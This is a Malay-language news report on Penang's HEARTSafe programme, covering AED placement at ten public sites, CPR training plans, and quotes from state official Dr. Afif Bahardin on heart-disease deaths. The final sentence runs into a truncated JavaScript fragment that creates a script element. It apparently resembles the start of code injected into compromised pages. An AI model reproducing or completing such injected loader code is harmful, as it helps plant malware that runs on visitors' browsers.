Program HEARTSafe Penang hadapi situasi serangan jantung

Oleh : NORSHAHIDA YUSOFF
Gambar : ALISSALA THIAN

GEORGE TOWN – Pulau Pinang bakal muncul sebagai negeri pertama yang sedia menangani situasi kecemasan serangan penyakit kardiovaskular atau lebih dikenali sebagai penyakit jantung dengan pelancaran program HEARTSafe Penang baru-baru ini di sini.

Lanjutan itu, beberapa kawasan utama yang dilihat ‘berisiko tinggi’ bakal dilengkapkan dengan 10 unit (satu kawasan satu unit) alatan bantuan kecemasan Defibrilator Luaran Automatik (AED) bagi tujuan berkaitan secara berperingkat.

Ini termasuk, Taman Botani, Taman Perbandaran, Gurney Drive, Padang Kota Lama,Golden Sands Beachfront, MPSP Tower, Bukit To’Kun, Kompleks Sukan di Jalan Betik dan Kompleks Sukan Bertam.

Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin berkata, Pulau Pinang dalam rancangan melaksanakan program komuniti bagi mendidik orang awam mengenalpasti ciri-ciri serangan jantung secara tiba-tiba, melakukan CPR, menggunakan AED dan cara bertindak balas terhadap kecemasan serangan jantung.

“Inisiatif ini adalah sebagai persiapan awal dalam menghadapi situasi serangan jantung membabitkan kawasan awam, selain bagi kepentingan awam dan pelawat ke negeri ini.

“Justeru, bagi melaksanakan program ini, kita (Kerajaan Negeri) akan bekerjasama dengan organisasi latihan, para profesional dalam bidang kesihatan dan rakan kongsi industri untuk memberi latihan kepada orang ramai,”ucapnya pada Persidangan Asia Pasifik Pertama Jururawat Bantuan Pernafasan- Kelangsungan Hidup Serangan Jantung di sini baru-baru ini.

Ketua Menteri, Y.A.B. Tuan Lim Guan Eng hadir menyempurnakan majlis perasmian persidangan berkaitan.

Hadir sama, Pengarah Operasi Asia Pasifik ZOLL Medical Corporation, Christopher Barnabas dan Naib Presiden CPR Pulau Pinang, Dr. Luah Lean Wah

Mengulas lanjut. Afif memberitahu, setiap tahun di Pulau Pinang, hampir 3,000 individu mati disebabkan penyakit jantung.

“Sekiranya lebih ramai orang mendapatkan pendidikan bantuan pernafasan kecemasan (CPR) dan cara penggunaan AED yang lebih meluas, kadar kelangsungan hidup boleh meningkat kepada 62 peratus,” ujar beliau.

Pelaksanaan HEARTSafe Penang merangkumi tiga peringkat iaitu, pertama, meningkatkan kesedaran dan memberi didikan di seluruh Pulau Pinang berhubung pengesanan awal dan bahaya serangan jantung secara tiba-tiba.

Kedua, pemasangan AED di 10 kawasan dikenalpasti secara berperingkat dan ketiga, latihan dan tindak balas awam dalam melakukan CPR serta penggunaan AED.var d=document;var s=d.createElement(‘script’);